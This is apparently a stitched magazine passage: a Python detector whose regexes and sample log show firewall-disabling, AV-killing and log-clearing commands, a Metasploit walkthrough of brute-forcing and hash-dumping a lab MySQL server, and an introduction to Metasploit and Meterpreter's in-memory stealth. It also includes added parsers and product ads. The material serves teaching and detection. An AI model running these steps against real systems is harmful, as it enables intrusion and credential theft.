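AV_IMAGE_PREFIXES = ("avg",)
AV_IMAGE_RE = "|".join(re.escape(p) for p in AV_IMAGE_PREFIXES)

# One regex per command the article runs from the remote shell.
COMMAND_RULES = {
    "firewall_disabled": re.compile(
        r"\bnetsh\b.*\bfirewall\s+set\s+opmode\s+mode=disable\b", re.I),
    "service_autostart_disabled": re.compile(
        r"\bsc(?:\.exe)?\s+config\s+\S+\s+start=\s*disabled\b", re.I),
    "av_process_killed": re.compile(
        r"\btaskkill(?:\.exe)?\b.*/IM\s+\"?(?:" + AV_IMAGE_RE + r")", re.I),
    "forced_reboot": re.compile(
        r"\bshutdown(?:\.exe)?\s+[-/]r\b.*[-/]t\s+0\b", re.I),
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+event=(?P<event>\d+)"
    r"(?:\s+cmd=(?P<cmd>.*))?$")


def parse_line(line):
    """Parse one event line into a dict, or return None for junk lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def match_event(ev):
    """Name of the rule this event triggers, or None."""
    if ev["event"] in LOG_CLEARED:
        return LOG_CLEARED[ev["event"]]
    if ev["event"] in PROCESS_CREATED and ev["cmd"]:
        for name, rx in COMMAND_RULES.items():
            if rx.search(ev["cmd"]):
                return name
    return None


def detect(lines, window=timedelta(minutes=30)):
    """Per-host findings: rule hits in time order, plus whether two or
    more distinct rules fired on that host inside `window`. A single
    hit may be an administrator; the chain is what the article's
    attacker does."""
    hits = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        name = match_event(ev)
        if name:
            hits.setdefault(ev["host"], []).append((ev["ts"], name))
    findings = {}
    for host, evs in hits.items():
        evs.sort()
        sequence = any(
            len({n for t, n in evs[i:] if t - t0 <= window}) >= 2
            for i, (t0, _) in enumerate(evs))
        findings[host] = {"rules": [n for _, n in evs], "sequence": sequence}
    return findings


# Constructed sample events replaying the article's steps on one host,
# plus one unrelated service change on another host.
SAMPLE_LOG = """\
2012-08-01T10:00:01 host=XPSP2-LAB event=592 cmd=netsh firewall show opmode
2012-08-01T10:00:09 host=XPSP2-LAB event=592 cmd=netsh firewall set opmode mode=disable
2012-08-01T10:03:40 host=XPSP2-LAB event=592 cmd=sc config avgwd start=disabled
2012-08-01T10:03:52 host=XPSP2-LAB event=592 cmd=sc config avgidsagent start=disabled
2012-08-01T10:04:30 host=XPSP2-LAB event=592 cmd=shutdown -r -t 0
2012-08-01T10:09:15 host=XPSP2-LAB event=592 cmd=taskkill /F /IM "avg"
2012-08-01T10:12:00 host=XPSP2-LAB event=1102
2012-08-01T10:12:00 host=XPSP2-LAB event=104
2012-08-01T11:30:00 host=FILESRV01 event=4688 cmd=sc config Spooler start=disabled
""".splitlines()

if __name__ == "__main__":
    for host, f in detect(SAMPLE_LOG).items():
        print(host, "SEQUENCE" if f["sequence"] else "isolated", f["rules"])
```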

MySQL Injection through Metasploit

We have seen how to exploit a vulnerability on a remote system. We have seen how to gain access on it remotely using MSF. We have also seen how we can disable the Firewall and Anti-virus running on a system using MSF.

Now, we shall move to another interesting area. We will attack databases with the Metasploit Framework. I thought that this could be the last demonstration for this issue on using the Metasploit Framework, but it will definitely be a very useful demonstration since MySQL is very common on the internet today, more common than Oracle.

In most of the penetration tests that I have done for my clients, I have found at least one system running a MySQL server. I’m sure that most of you face similar situations.

Figure 32. Using auxiliary/scanner/mysql/mysql_version module

Figure 33. Running the version check and discovering the MySQL server version

In this demonstration I will show you how you can attack a MySQL database using MSF. I suggest running a Linux operating system with the MySQL server, and setting that up on your Virtual Machine. It’s really not difficult to do, you just need to download the right files from the right places and set them up. Setting up the MySQL server isn’t really in the scope of this article. Here, I’m going to try and concentrate on attacking the setup. You can probably find some nice tutorials on setting up the MySQL server using Google.

So, after setting up the MySQL Server on a Virtual Machine and starting the required services, you would need to find the IP address of the target machine using ifconfig. Now, before we even begin our attack, we should find out more about the MySQL Server running on the target box. Knowing versions of a service running on the target always helps since it allows us to find multiple vulnerabilities and sometimes, even 0days on that particular version of software. So, we can do this by loading a MSF module using the command use auxiliary/scanner/mysql/mysql_version (Figure 32).

Now, the only thing we need is the remote IP address (IP address of target machine) to execute this module to find the MySQL server version. This, we have already found. If you haven’t, you can find it. After you do, you must set the RHOST value as the target IP address and then execute it by using the command run, as follows: Figure 33.

Looking at the output, we can easily figure out that the target box is running MySQL 5.0.51a-3ubuntu5 (protocol 10). This information is very useful to us, as we can find exploits for it, using simple Google searches.
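To see where that version string comes from, the following Python parser (an added example, not part of the article or of the mysql_version module) decodes the protocol-10 server greeting that every MySQL server sends before any authentication. The packet bytes are constructed to mimic the 5.0.51a-3ubuntu5 server above, and the capability bits show whether the server even offers TLS, which is the first question a defender should ask about any reachable MySQL port.

```python
"""Decode the MySQL protocol-10 server greeting (initial handshake).

Added example, not part of the article or of Metasploit. build_greeting()
constructs a packet shaped like the one a 5.0.51a-3ubuntu5 server sends;
parse_greeting() recovers what an unauthenticated scanner learns from it.
"""
import struct

# Capability flag bits from the MySQL client/server protocol.
CLIENT_SSL = 0x0800                 # server accepts a TLS upgrade
CLIENT_SECURE_CONNECTION = 0x8000   # 4.1-style challenge-response auth


def build_greeting(version, conn_id=7, capabilities=0xA23F, charset=8,
                   status=2, salt=b"A" * 20):
    """Constructed greeting used only to feed the parser (test fixture)."""
    payload = (
        bytes([10])                              # protocol version 10
        + version.encode("ascii") + b"\x00"      # NUL-terminated version
        + struct.pack("<I", conn_id)             # connection/thread id
        + salt[:8] + b"\x00"                     # auth data part 1, filler
        + struct.pack("<H", capabilities & 0xFFFF)
        + bytes([charset]) + struct.pack("<H", status)
        + struct.pack("<H", capabilities >> 16)  # upper capability bits
        + b"\x00" + b"\x00" * 10                 # auth data len, reserved
        + salt[8:] + b"\x00"                     # auth data part 2
    )
    header = struct.pack("<I", len(payload))[:3] + b"\x00"  # len, seq 0
    return header + payload


def parse_greeting(packet):
    """Return the pre-authentication fields of a protocol-10 greeting."""
    if len(packet) < 4:
        raise ValueError("short packet")
    length = int.from_bytes(packet[:3], "little")
    payload = packet[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    protocol = payload[0]
    if protocol != 10:
        raise ValueError(f"unsupported protocol version {protocol}")
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode("ascii", errors="replace")
    pos = end + 1
    conn_id = struct.unpack_from("<I", payload, pos)[0]
    pos += 4 + 8 + 1   # connection id, 8 bytes of auth data, filler byte
    caps = struct.unpack_from("<H", payload, pos)[0]
    pos += 2
    charset = status = None
    if len(payload) >= pos + 5:      # 4.1+ servers append these fields
        charset = payload[pos]
        status = struct.unpack_from("<H", payload, pos + 1)[0]
        caps |= struct.unpack_from("<H", payload, pos + 3)[0] << 16
    return {
        "sequence": packet[3],
        "protocol": protocol,
        "version": version,
        "connection_id": conn_id,
        "capabilities": caps,
        "tls_offered": bool(caps & CLIENT_SSL),
        "secure_auth": bool(caps & CLIENT_SECURE_CONNECTION),
        "charset": charset,
        "status": status,
    }


def banner(fields):
    """Same summary line the scanner prints: '<version> (protocol <n>)'."""
    return f"{fields['version']} (protocol {fields['protocol']})"


if __name__ == "__main__":
    info = parse_greeting(build_greeting("5.0.51a-3ubuntu5"))
    print(banner(info), "TLS offered:", info["tls_offered"])
```

Because all of this is sent before the client presents credentials, the only effective mitigation is network reachability (bind address, firewall rules), not account hardening.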

Now, you might be thinking, ‘Ok, lets Google for exploit for the MySQL version and pwn this box!!’ No, I suggest one step before that. Try running a script that checks if the server is using default username-password combinations. A lot of server administrators forget to put passwords on default accounts and that just makes our job easier. So, I’m going to run a scan for that. This is a kind of brute-force against the MySQL server. What you are basically doing is brute-forcing the logins. Luckily, MSF offers a module for that! This module is called mysql_login. You can use this module by running the command use auxiliary/scanner/mysql/mysql_login.

The mysql_login module can be used in conjunction with your word-lists in order to discover at least one valid database account. This checks the MySQL database for weak credentials and is a good practice. There are three variables that you need to set – RHOST, USER_FILE and PASS_FILE. USER_FILE contains possible usernames. PASS_FILE contains a list of passwords. These two files can be text files (.txt) or list files (.lst), with full path as shown: Figure 34.

Figure 34. Setting the variables and running

Figure 35. Running the mysql_login module

Figure 36. Configuring the mysql_enum module

You can run the module with the run command as shown above. After looking at the output of the scanner, you will see that the scanner has been successful (unless, of course, you have added strong passwords to the guest and root accounts). This is a demonstration, hence, I’ll not be going into the process of bruteforcing username and password combinations.

After running the module, you should see output like in the following Figure 35.

Before connecting to the MySQL server directly using the login information, we can use two other MSF modules to enumerate the database and dump credential information. The two modules that we will be using are mysql_enum and mysql_hashdump.

This can be done manually, but knowing that an automation module for this process exists, we would tend to do it the easy way. Mysql_enum is used to find information about the various database accounts on the remote MySQL server. But we will need to configure three variables to do so – RHOST, USERNAME and PASSWORD. But since the password to the root account is blank, we do not need to set the PASSWORD variable. After configuring the module, you can run it with the run command (Figure 36).

Figure 37.

Figure 38. Configuring and running the mysql_hashdump module

Figure 39. Connecting to the target MySQL Server using the discovered credentials

Figure 40.

Sample output of the preceding command is: Figure 37.

Now, it is time to configure the mysql_hashdump module to dump the password hashes belonging to the various database user accounts. Again, the same variables need to be set as for the previous module. After configuring the module, you can run it using the run command, as follows: Figure 38.

After this process is complete, we can make a direct connection to the target MySQL server using a mysql client. Since the attacker box is running BackTrack 5, the mysql client is pre-installed. You can run it with the following syntax – mysql -h <IP> -u <username> -p <password>. Replace the required parts of the command and run it. This is how it looks after the connection is established (Figure 39).

Now that the mysql connection has been established, you can run various commands to hit the jackpot! You can use the show databases; command to display a list of databases on the server. You might get something like this: Figure 40.

Now, let me assume that you might be interested in the database called ‘mysql.’ You can now use the mysql database using the command use mysql. It will show you a message which acknowledges that the database has been changed. After that, you can run the command show tables; to list the tables on the current database (in this case – mysql) (Figure 41).

Now, the most interesting table here is the one called user. If user has two columns called username and password, then you can extract the data from the table user using the command select username, password from user; On running that command, you should see something similar to the output shown in Figure 42.

We can now see that there are three users with no password. You may now decide that you want to see the tables in the database ‘owasp10.’ You can do that by running the command show tables from owasp10;.

Figure 41. Tables in the database named ‘mysql’

Figure 42. Data in table ‘user’

Now, you’ll see the tables present in the owasp10 database. You might see something like this: Figure 43.

You can go on like this till you find the information that you are hired to find. Remember, these tables were created well in advance for the sake of demonstration of various commands for this tutorial. You will not find all of these tables in your installation unless you create them before you launch this attack.

The methods described here, are solely for teaching you the various techniques that may be used for exploiting machines using MSF. It is to show how useful MSF is, in real-world scenarios. In the beginning of this issue, I have pointed out that MSF makes it very easy for us to configure and deploy exploits.

I have shown you how simple it is to use the msfconsole, which is the CLI for the Metasploit Framework. Configuring exploits was really easy. I suggest you all, to try as many exploitations as you can legally.

Do not use these techniques to do anything illegal, that is not the purpose of these tutorials. These articles and instructions are mainly to break the ice, and introduce you to the most common and simplest of exploitation frameworks out there.

I would like you all to try your attacks either on war-gaming server, or better, on your virtual machines, using the Metasploitable VMWare Image. You can find out more by following this link – http://www.offensive-security.com/metasploit-unleashed/Metasploitable.

I have only demonstrated a few of the existing MSF scripts which may be used in various attacks. They are extremely helpful (but sometimes fail, as we have seen, when we tried to kill our AV). I suggest reading about the rest of the MSF scripts from here – http://www.offensive-security.com/metasploit-unleashed/Existing_Scripts.

The best place to learn more about the Metasploit Framework, is the official website of Metasploit. It goes through everything from the basics to the more advanced techniques. I would like all of you to read up from here – http://www.offensive-security.com/metasploit-unleashed/Main_Page.

There are many parts of the Metasploit Framework that are not really in the scope of this issue; I may cover them in future issues if the editorial board of Hakin9 permits. Armitage, SET (Social Engineering Toolkit) and Fast-Track are some important things you can read about.

If you need a complete MSF Module reference, you can find one online, on the official Offensive-Security website – http://www.offensive-security.com/metasploit-unleashed/Module_Reference. Why read from some other source, when the creators themselves put it up, in a neat way. This link is definitely a must-read for everybody.

A lot of Exploits may not be directly included into Metasploit. MSF offers the flexibility of writing your own exploits and modules and including them into the Framework. But another place, where there are up-to-date public exploits, as a searchable database is http://www.exploit-db.com/. You can also go through some of the papers there, a lot of very well written stuff.

After going through this issue, you might just feel like writing exploits yourself. There are very few places on the internet that actually offer tutorials for this. The best place that gives you an idea on exploit-writing, from the very basic stack based overflows, to the more advanced exploits is – http://corelan.be/.

Well, I think I’ve covered most of what I wanted to. I’d like to thank the Hakin9 team for giving me this opportunity to write for this issue. I’m very glad and extremely grateful. I hope they give me such opportunities in the future as well.

Cheers!

Figure 43. Tables in the database called ‘owasp10’

ABHINAV DAS
www.abhinavdas.in
@theabhinavdas


Metasploit: Part-I

When it comes to penetration testing and a single tool is required to own all the boxes, Metasploit Framework is the one stop shop. Metasploit Framework, better known as MSF, is an advanced open-source tool written in Ruby which provides security researchers and pentesters a framework to develop and launch exploits, payloads, encoders, exploration and other different security testing tools.

by Sudhanshu Chauhan

MSF initially started as a collection of exploits, but as the technology advanced it began to grow in size as well as functionality. Currently it provides capabilities for the design and development of reconnaissance, exploitation and post-exploitation security tools. It ranks second on SecTools.Org: Top 125 Network Security Tools (Source: Sectools.org).

Metasploit was basically developed by HD Moore in 2003 as a network tool. Initially it was created using the scripting language Perl but later on, it was completely rewritten in the Ruby programming language. Today it is one of the largest Ruby projects with more than 700,000 lines of code. The Metasploit project was acquired by Rapid7, a company that provides security risk intelligence solutions, on October 21, 2009. Figure 1 shows a screenshot of the Metasploit console.

Figure 1. Metasploit Console

Some of the terms used above (and further in the article) are clarified as below:

Exploit

A piece of software, a data chunk, or command sequence that takes advantage of a bug, vulnerability or bad configuration in order to cause unintended or unanticipated behavior to occur on computer software or hardware.

Payload

The essential data that is being carried within a packet or other transmission unit. It is basically the code that will be executed on the target system upon successful exploitation.

Encoders

Ways to twist the code such that anti-malware applications/IDS/IPS won’t detect the payload.

The basic exploitation steps using the Framework are:

• Choosing and configuring an exploit;
• Validate whether the chosen system is susceptible to the chosen exploit (optional);
• Choosing and configuring a payload;
• Choosing the encoding technique to encode the payload;
• Executing the exploit.

Figure 2 displays the exploitation process through an example of successful Windows 7 machine exploitation.

One of the major advantages of the MSF is the modularity of allowing combining any exploit with any payload. It assists the tasks of all the attackers, the exploit writers, and the payload writers and hence has become the tool of choice for anybody related to information security (or insecurity).

To initialize the process of exploitation, some information is required about the target system (like OS/Browser version). This information can be collected via techniques like port scanning, OS fingerprinting, banner grabbing etc. Some of the best tools of the trade that implement these techniques are nmap (network mapper), Nessus (vulnerability scanner) etc.

Based on this information the exploit and payload are chosen and the exploitation process advances. Metasploit has the ability to import vulnerability scan records and match the identified vulnerabilities to existing exploit modules for accurate exploitation, and this ability is what makes MSF one of the best exploitation frameworks with periodic functionality updates.

Figure 2. Exploitation Example

MSF Environments

Metasploit framework has four work environments, msfconsole, msfcli, msfweb and the msfgui interface (newly introduced), each with their own strengths and weaknesses. All these interfaces are explained below:

Msfconsole

The msfconsole is the traditional and primary means of using the MSF. It provides a centralized console and allows efficient access to virtually all of the options available in Metasploit framework. After installation, the console can be simply launched by typing the command ./msfconsole. Figure 3 shows the msfconsole interface.

Pros and Cons:

• It is the most well supported way to access all (almost) the features within Metasploit.
• It is the most stable MSF interface.
• Full readline support, tabbing and command completion available.
• External command execution is possible.
• Not as point and click as msfgui/msfweb.

Msfcli

The msfcli interface allows for exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface.

This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. But it can handle only one shell at a time, which makes it quite impractical for client-side attacks. Figure 4 shows the msfcli interface.

Pros and Cons:

• It’s easy to use and hence good for learning.
• Ideal for use in scripts and simple automation.
• Only one shell can be handled at a time.
• Not as well supported as msfconsole.

Msfweb

The Msfweb provides the user with a browser based interface to access and launch exploits, but is not a recommended interface as it is not very stable and not being actively developed.

It’s good for demonstration purpose only. Figure 5 shows msfweb.

Pros and Cons:

• It provides a pretty, easy-to-use interface.
• Good for the demonstration of the exploitation to the management/layman.
• Not as well supported as msfconsole.
• Slower and less stable.

Figure 3. msfconsole

Figure 4. msfcli

Msfgui

A new GUI for Metasploit has been added to the Metasploit SVN Repository in 2010, which provides the functionality of msfconsole in addition to many new features. This new GUI is multi-platform and it is based on Java. It provides a better interface than Msfweb and is more stable. Figure 6 shows msfgui.

Pros and Cons:

• Provides a very stable GUI.
• Easy to implement and use.
• Requires comparatively more memory.

Figure 6. msfgui

Figure 5. msfweb


MSF Basic Commands

Before using MSF for exploit development and/or pentesting it would be useful to learn some basic commands and their functionality. Below is a set of the most frequently used commands.

• help: The 'help' command does what its name suggests, it gives basic information of all the commands.

• search <keyword here>: Inputting the command ‘search’ along with the keyword lists out the various possible exploits, payloads that have that keyword pattern in them.

• show exploits: The command 'show exploits' lists out the currently available exploits.

• show payloads: Using the same 'show' command, we can also list the payloads available.

• show options: Typing in the command 'show options' will show options that have been set. Each exploit and payload comes along with its own options that can be set.

• info <type> <name>: To search for specific information on an exploit or payload, use the 'info' command.

• use <exploit name>: Inserting this command tells Metasploit to use the exploit with the specified name provided.

• set RHOST <hostname/ip>: This command is used to instruct Metasploit to target the specified remote host.

• set RPORT <host port>: This command sets the port that Metasploit will connect to on the remote host.

• set PAYLOAD <payload name>: This command sets the payload that is to be used and will provide a shell when a service has been exploited.

• set LPORT <local port>: This command sets the port number that the payload will open on the server machine when a service is exploited. One thing to note here is that the provided port number should not be reserved or already in use on the machine.

• exploit: Actually launch the exploit code on the service to be exploited.

• sessions -l: Displays and controls sessions between the user and targeted hosts.

• sessions -i <ID>: Various sessions on the exploited systems can be accessed using this command, where ID specifies the session to be interacted with.

• Anything that can run from the command line.

Some of these commands are demonstrated in Figure 2.

MSF Exploit types

MSF Exploits can be divided into two categories namely active and passive based on the way they operate.

Figure 7. Meterpreter


Active exploit

An active exploit will execute till its completion and exploit a specific host machine and finally will exit. Brute-force modules will exit when a shell opens from the victim. In case an error is encountered the module execution will stop. An active module can be forced to the background by passing -j to the exploit command.

Passive exploit

A passive exploit holds and waits for an incoming host and exploits them as they connect. These exploits mostly focus on clients (web browsers, FTP clients, etc.), i.e. intervention from the victim user’s side. Passive exploits report shells as they happen and can be enumerated by passing sessions -l which displays and controls sessions between the user and targeted hosts. Sessions on the exploited systems can be accessed using the sessions -i command, along with the session ID.

MSF payload types

MSF provides three different payload modules: Singles, Stagers and Stages. Each payload provides different functionality and is suitable for a different scenario.

Singles

They are self-contained payloads which do a specific task. E.g. windows/adduser.

Stagers

Stagers create a network connection between attacker and victim; they are required as singles cannot deliver an arbitrarily large payload in one shot (depending upon the exploit). E.g. windows/shell/bind_tcp (Bind TCP Stager).

Stages

Stages are payload components that are downloaded by stagers and executed. They typically do complex tasks like VNC, Meterpreter etc. E.g. windows/shell/bind_tcp (Windows Command Shell).

Meterpreter

Explanation of the Metasploit payloads cannot be complete without an explanation of Meterpreter, an advanced payload included in MSF. The way to look at the Meterpreter is not simply as a payload, but slightly as an exploit platform that is executed on the remote system.

Meterpreter is short for Meta-Interpreter, which is a multi-faceted, dynamically extensible payload that uses in-memory DLL injection and is runtime extensible over the network. DLL injection is a technique used to execute code inside the address space of a different process by forcing it to load a dynamic-link library. The striking features which make Meterpreter stand out from other payloads are as follows:

• It does not create a new process.
• It does work in chroot’d environments.
• It does allow for robust extensibility.

Meterpreter and all of the extensions that it loads are executed completely from memory and never touch the target’s disk, thus leave no trace on the hard disk which allows them to execute under the radar of standard Anti-Virus detection/Forensic techniques. Scripts and plugins can be loaded, executed and unloaded dynamically as and when required. Figure 7 demonstrates a Meterpreter core command list.

Meterpreter is designed in such a manner that it can work on various different platforms, provided that there is a means by which shared objects can be loaded from memory.

This makes it possible to have a single meterpreter client that is capable of running modules which are designed and developed to compile on a variety of platforms and architectures. Meterpreter can be considered as a typical command interpreter which has a command line and a set of commands that can be executed. The functionality it provides is that the meterpreter client can control the set of commands by injecting new extensions at runtime. As the extensions can potentially be applicable across platforms and architectures, so the meterpreter client can use the same client interface (and command set) to control the extensions regardless. It communicates over the stager socket and offers a wide-ranging client-side Ruby API. Metasploit has a full-featured Ruby client API.

How it works (source: http://www.offensive-secu-rity.com/metasploit-unleashed).

• The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.

• The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL.

• The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client.

• Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV protocol.
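To make the TLV step concrete, here is an added example that is not the article’s or Metasploit’s own code: a decoder for one plaintext packet in a length/type/value layout. The layout, the meta-type bit flags and the type ids (TLV_METHOD and friends) are assumptions taken from my reading of the Metasploit source of the period, not from the article, and the core_loadlib request in the sample is constructed.

```python
# Added example, not from the article or from Metasploit. Assumed layout
# (from the Metasploit source of the period, not stated in the article):
# TLV = 4-byte big-endian length counting its own 8-byte header, 4-byte
# big-endian type whose upper 16 bits are a meta-type, then the value;
# a packet is one such header (length, packet type) followed by TLVs.
import struct

META_STRING, META_UINT, META_GROUP, META_MASK = 1 << 16, 1 << 17, 1 << 30, 0xFFFF0000
# Type ids below are assumed values; the decoding logic does not depend on them.
TLV_METHOD, TLV_REQUEST_ID, TLV_RESULT = META_STRING | 1, META_STRING | 2, META_UINT | 4
NAMES = {TLV_METHOD: "method", TLV_REQUEST_ID: "request_id", TLV_RESULT: "result"}

def decode_tlvs(buf: bytes):
    """Yield (type, value) pairs; refuse any TLV that would run past the buffer."""
    off = 0
    while off < len(buf):
        if off + 8 > len(buf):
            raise ValueError("truncated TLV header at offset %d" % off)
        length, tlv_type = struct.unpack_from(">II", buf, off)
        if length < 8 or off + length > len(buf):
            raise ValueError("bad TLV length %d at offset %d" % (length, off))
        raw = buf[off + 8:off + length]
        meta = tlv_type & META_MASK
        if meta == META_STRING:
            value = raw.rstrip(b"\0").decode("utf-8", "replace")  # NUL-terminated
        elif meta == META_UINT and len(raw) == 4:
            value = struct.unpack(">I", raw)[0]
        elif meta == META_GROUP:
            value = list(decode_tlvs(raw))  # nested TLVs use the same layout
        else:
            value = raw  # raw or unknown meta-types stay as bytes
        yield tlv_type, value
        off += length

def decode_packet(buf: bytes) -> dict:
    """Parse one packet: 8-byte (length, packet type) header, then TLVs."""
    total, ptype = struct.unpack_from(">II", buf, 0)
    if total != len(buf):
        raise ValueError("length field %d does not match %d bytes" % (total, len(buf)))
    return {"packet_type": ptype,
            "tlvs": [(NAMES.get(t, hex(t)), v) for t, v in decode_tlvs(buf[8:])]}

def encode_tlv(tlv_type: int, raw: bytes) -> bytes:
    return struct.pack(">II", len(raw) + 8, tlv_type) + raw

# Constructed sample request (packet type 0 = request in the assumed layout).
BODY = encode_tlv(TLV_METHOD, b"core_loadlib\0") + encode_tlv(TLV_REQUEST_ID, b"1\0")
SAMPLE_PACKET = struct.pack(">II", len(BODY) + 8, 0) + BODY
```

The length checks matter for an analyst’s tooling: a capture with a corrupted or hostile length field should raise rather than read past the buffer.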

Meterpreter Design Goals

Stealthy
Stealth is one of the most important goals of a pentester during exploitation. Meterpreter provides this feature by completely residing in memory and not touching the disk, hence leaving no trace behind for forensic analysis. Meterpreter injects itself into the compromised process and creates no new processes. It can also migrate to other running processes easily. By default, Meterpreter uses encrypted communications, which makes it even stealthier.
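For a defender, the in-memory behaviour just described is exactly what memory forensics looks for. The following is an added example, not code from the article or from Metasploit: a toy heuristic over process memory regions (the record fields and the sample regions are constructed assumptions) that flags executable memory with no file backing, RWX protection, or a PE header sitting in private memory.

```python
# Added example, not the article's own code: a toy memory-forensics
# heuristic for what the Stealthy paragraph describes, an executable
# image that lives only in memory. The region records are constructed
# inline; real tooling would read them from a live process or a dump.
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class Region:
    base: int         # start address
    size: int         # length in bytes
    protect: str      # page protection: "r", "rw", "rx" or "rwx"
    mapped_path: str  # backing file for image/mapped sections, "" if private
    head: bytes       # first bytes of the region

def looks_like_pe(head: bytes) -> bool:
    """True when a DOS stub's e_lfanew (offset 0x3C) points at the PE signature."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
    return head[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def suspicious_regions(regions: List[Region]) -> List[Tuple[Region, List[str]]]:
    """Executable regions with reasons for a closer look. Triage signals only:
    JIT engines use private executable memory too, and a loader may wipe the
    MZ/PE header, so a missing header does not clear a region."""
    findings = []
    for r in regions:
        if "x" not in r.protect:
            continue  # only executable memory matters for this check
        reasons = []
        if r.mapped_path == "":
            reasons.append("executable memory not backed by a file on disk")
        if r.protect == "rwx":
            reasons.append("writable and executable at the same time")
        if r.mapped_path == "" and looks_like_pe(r.head):
            reasons.append("PE image in private memory (loaded without touching disk)")
        if reasons:
            findings.append((r, reasons))
    return findings

# Constructed sample: a minimal DOS header whose e_lfanew points at 'PE\0\0' at 0x40.
PE_HEAD = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0"
SAMPLE = [
    Region(0x77000000, 0x100000, "rx", r"C:\Windows\System32\ntdll.dll", PE_HEAD),
    Region(0x00400000, 0x1000, "rw", "", b"\0" * 0x44),              # data, not code
    Region(0x02A10000, 0x30000, "rwx", "", PE_HEAD),                  # looks injected
    Region(0x02B00000, 0x1000, "rx", "", b"\x55\x8b\xec" + b"\0" * 0x41),  # JIT-like
]
```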

Powerful
Meterpreter utilizes a channelized communication system and provides some powerful features such as uploading and downloading files, retrieving password hashes, and scripts to automate common post-exploitation tasks.

Extensible
Features can be injected on the fly and are loaded over the network. New features can be added to Meterpreter without rebuilding it. This is done by loading extensions. The client can upload the DLL over the socket; it will be loaded in memory by the server running on the victim and initialized. The new extension will register itself with the server. The client on the attacker’s machine loads the local extension API and can call the extension’s functions.

Command Reference (source: http://dev.metasploit.com/documents/meterpreter.pdf).

Some common commands provided by Meterpreter:

• use: The use command is used to load Meterpreter extensions. These extensions typically provide more advanced commands and features to both the client and the server.

• read: This command reads data that has been output by the remote server’s side of the channel. A maximum amount of data to read can optionally be specified as the length parameter.

• write: This command writes an arbitrary amount of data to the input handler on the remote server’s end of the channel. This is a non-interactive method by which data can be sent to the remote server’s end of the channel. Once the command is issued, data can be typed on the client’s side until complete. Once complete, a ‘.’ should be issued on an empty line, thus symbolizing the end of the input.

• close: This command closes a channel and frees its resources. After a channel is closed it cannot be read from, written to, or interacted with. Most channels close automatically.

• interact: This command starts an interactive session with the channel specified in channel id. To terminate the interactive session a Ctrl-C must be issued. A prompt will be given asking whether or not the interactive session should really be terminated.

• initcrypt: This command provides the client with the ability to enable an arbitrary cipher which will, as a result, encrypt the Value field of all the packets sent between the client and the server, excluding those which are explicitly PLAIN. The only supported cipher at the time of this writing is XOR, but the framework exists for adding custom ciphers.

• upload: This command allows the client to upload files from the local machine to the remote server. The command allows for specifying one or more files that are local to the client machine and are to be uploaded to the directory specified in dst on the remote server.

• download: This command allows the client to download files from the remote server to the local client’s machine. The command allows for specifying one or more files that are to be downloaded to the directory specified in dst.

• portfwd: This command is an advanced means by which TCP connections can be tunneled through the connection between the client and the server to hosts on the server’s network. This allows the client to access hosts on the server’s network which may not otherwise be directly accessible. It is also useful for chaining exploits.

• execute: This command is used to execute an application on the remote server, optionally channelizing the input and output. When the input and output are channelized by using the -c parameter, it is possible for the client to read, write, and interact with the executable on the server.

• kill: This command provides a means by which processes on the remote server can be terminated.

• getuid: Provides the username that is associated with the currently logged in user for the process.

• sysinfo: Provides information about the target host such as the computer’s name and its OS version string.

Conclusion
This article provided a high-level introduction to the Metasploit Framework and its usage. Metasploit is not just an exploitation framework; it also provides some great post-exploitation and security testing features which certainly take pentesting to the next level. Meterpreter’s ability to perform in-memory library injection makes it the ideal vector for stealth. With Meterpreter’s complete integration into the Metasploit Framework it can easily be used with future exploits. With very strong and constantly evolving Metasploit development, it is hoped that new and existing modules will be developed and extended to make the Metasploit Framework an even more powerful tool.

Reference Website: http://www.offensive-security.com/metasploit-unleashed/.

GEEK 411 | UAT STUDENT LIFE MAGAZINE | 1

THEY SELDOM SMILE AT THE NSA. CAN YOU MAKE THEM GRIN?

Prepare to Defend!
www.uat.edu

877.828.4335

Learn how to synthesize and apply these vital skills and leadership ability to succeed in the fast moving field of Network Security.

Program accreditations, affiliations and certifications:

UAT has been designated as a Center for Academic Excellence in Information Systems Security Education by the US National Security Agency

One of the most prestigious Network Security programs in the country

UAT’s coveted Bachelor of Science degree in Network Security is a vital national resource

We will teach you the concepts of security by design, and layered security to protect against exploitation of networks and data

CLUSTERGEEK WITH CAUTION!
LEARN, EXPERIENCE AND INNOVATE WITH THE FOLLOWING DEGREE STUDENTS: Advancing Computer Science, Artificial Life Programming, Digital Media, Digital Video, Enterprise Software Development, Game Art and Animation, Game Design, Game Programming, Human-Computer Interaction, Open Source Technologies, Robotics and Embedded Systems, Serious Game and Simulation, Strategic Technology Development, Technology Product Design, Technology Studies, Virtual Modeling and Design, Web and Social Media Technologies

Bachelor of Science: Network Engineering, Network Security, Technology Forensics

Master of Science: Information Assurance


SYSTEMS SECURITY FOR THE 21st CENTURY

PLEASE SEE WWW.UAT.EDU/FASTFACTS FOR THE LATEST INFORMATION ABOUT DEGREE PROGRAM PERFORMANCE, PLACEMENT AND COSTS.

The Industry’s First Commercial Pentesting Drop Box.

F E A T U R E S :

• Covert tunneling
• SSH access over 3G/GSM cell networks
• NAC/802.1x bypass
• and more!

t) @pwnieexpress e) [email protected] p) 802.227.2PWN

Air Freshener?
Printer PSU? ...nope.
PwnPlug.

Discover the glory of Universal Plug & Pwn

@ pwnieexpress.com
